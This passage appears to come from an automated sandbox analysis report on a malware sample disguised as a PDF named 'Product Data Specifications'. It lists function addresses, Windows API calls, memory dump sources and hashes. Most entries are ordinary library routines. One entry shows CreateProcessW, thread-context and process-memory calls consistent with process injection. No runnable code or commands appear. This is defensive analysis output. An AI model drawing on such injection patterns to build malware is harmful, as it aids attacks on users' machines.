                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                              Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                              Download Yara Rule
                              APIs
                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconNotifyShell_
                              • String ID:
                              • API String ID: 1144537725-0
                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                              Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                              Download Yara Rule
                              APIs
                              • _malloc.LIBCMT ref: 0043214B
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _malloc.LIBCMT ref: 0043215D
                              • _malloc.LIBCMT ref: 0043216F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID:
                              • API String ID: 680241177-0
                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                              Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                              Download Yara Rule
                              APIs
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekTranslate
                              • String ID:
                              • API String ID: 4217535847-0
                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                              Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                              • Opcode Fuzzy Hash: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                              Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: bd136d67b55beea3429463d3d4f7789442ca244e86e209309dc7216971c9ef38
                              • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                              • Opcode Fuzzy Hash: bd136d67b55beea3429463d3d4f7789442ca244e86e209309dc7216971c9ef38
                              • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                              Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                              • _strcat.LIBCMT ref: 0040F786
                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                              • String ID:
                              • API String ID: 3199840319-0
                              • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                              • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                              Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FreeInfoLibraryParametersSystem
                              • String ID:
                              • API String ID: 3403648963-0
                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                              Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              • __lock_file.LIBCMT ref: 00414A8D
                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                              • __fclose_nolock.LIBCMT ref: 00414A98
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                              Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • __lock_file.LIBCMT ref: 00415012
                              • __ftell_nolock.LIBCMT ref: 0041501F
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2999321469-0
                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                              Function 04003B2D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 040042EB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04004381
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040043A3
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                              • Instruction ID: c51dc0cdf22929844eb7c758ccf142c39f50ebf4a9617b71384bd2dccd5344d9
                              • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                              • Instruction Fuzzy Hash: F812EE24E18658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5F81CF5A
                              Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                              • Opcode Fuzzy Hash: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                              Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                              Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                              • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                              Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __lock_file
                              • String ID:
                              • API String ID: 3031932315-0
                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                              Function 00479714 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                              • VariantClear.OLEAUT32(?), ref: 0047973E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Clear$CopyInit
                              • String ID:
                              • API String ID: 24293632-0
                              • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                              • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                              • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                              • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                              Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                              Function 04004B30 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 04004B41
                              Memory Dump Source
                              • Source File: 00000006.00000002.1383212336.0000000004002000.00000040.00000020.00020000.00000000.sdmp, Offset: 04002000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4002000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: a5a2deed5a25c7c254e280ed9452fc980578f6af2c5a3a50c17d266c6b2cce97
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
